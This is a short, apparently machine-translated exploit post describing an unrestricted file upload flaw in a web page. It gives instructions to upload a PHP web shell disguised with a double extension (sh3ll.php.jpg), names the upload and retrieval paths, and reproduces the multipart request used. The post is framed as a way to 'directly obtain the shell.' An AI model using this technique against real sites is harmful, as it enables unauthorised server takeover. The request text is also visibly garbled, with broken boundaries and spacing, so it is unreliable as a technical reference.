This web page has a severe vulnerability. You can directly obtain the shell. The following describes how to exploit the vulnerability.
Vulnerability Information:
Attackers can upload PHP, TXT, JPG, and PNG files at will.
Change your shell to sh3ll.php.jpg or sh3ll.php?0=0.1.jpg
Exploitation:
Www.2cto.com/[dir]/up/upload. php
File to be loaded:
Www.2cto.com/[dir]/up/img/Sh3ll.php.jpg
Core vulnerability code:
114782935826962 \ r \ nContent-Disposition: form-data;
Name = "MAX_FILE_SIZE" \ r \ n \ r \ n1048576 \ r \ n-1147829358
26962 \ r \ nContent-Disposition: form-data; name = "upfile ";
Filename = "sh3ll.php.jpg" \ r \ nContent-Type: text/plain \ r \ n
----------------------------- 114782935826962 \ r \ nContent-Disposition:
Form-data; name = "pass" \ r \ n -- 114782935826962 \ r \ nContent-Disposition: form-data;
Name = "com" \ r \ n ----------------------------- 114782935826962 -- \ r \ n